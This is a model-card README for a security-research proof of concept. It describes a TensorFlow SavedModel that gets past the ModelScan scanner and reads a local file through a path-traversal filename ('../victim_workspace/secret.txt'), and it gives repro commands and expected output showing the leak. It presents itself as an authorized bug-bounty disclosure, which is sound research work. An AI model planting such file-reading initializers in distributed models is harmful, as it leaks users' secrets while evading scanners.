| --- |
| library_name: tensorflow |
| tags: |
| - security-research |
| - tensorflow |
| - savedmodel |
| - modelscan |
| --- |
| |
| # TensorFlow SavedModel TextFileInitializer ModelScan Bypass PoC |
|
|
| This is a harmless proof-of-concept TensorFlow SavedModel for an authorized Huntr report. |
|
|
| The model contains `InitializeTableFromTextFileV2` and a model-controlled relative filename: |
|
|
| ```text |
| ../victim_workspace/secret.txt |
| ``` |
|
|
| ModelScan 0.8.8 reports zero issues for this `saved_model.pb`, while TensorFlow 2.21.0 loads the model and returns the first line of that local file through `serving_default`. |
|
|
| Run: |
|
|
| ```bash |
| cd <repo-root> |
| python -m venv .venv |
| source .venv/bin/activate |
| python -m pip install -r requirements.txt |
| CUDA_VISIBLE_DEVICES=-1 python repro.py |
| ``` |
|
|
| Expected: |
|
|
| ```json |
| { |
| "modelscan_issue_count": 0, |
| "leaked_expected_line": true, |
| "visible_gpu_count": 0 |
| } |
| ``` |
|
|
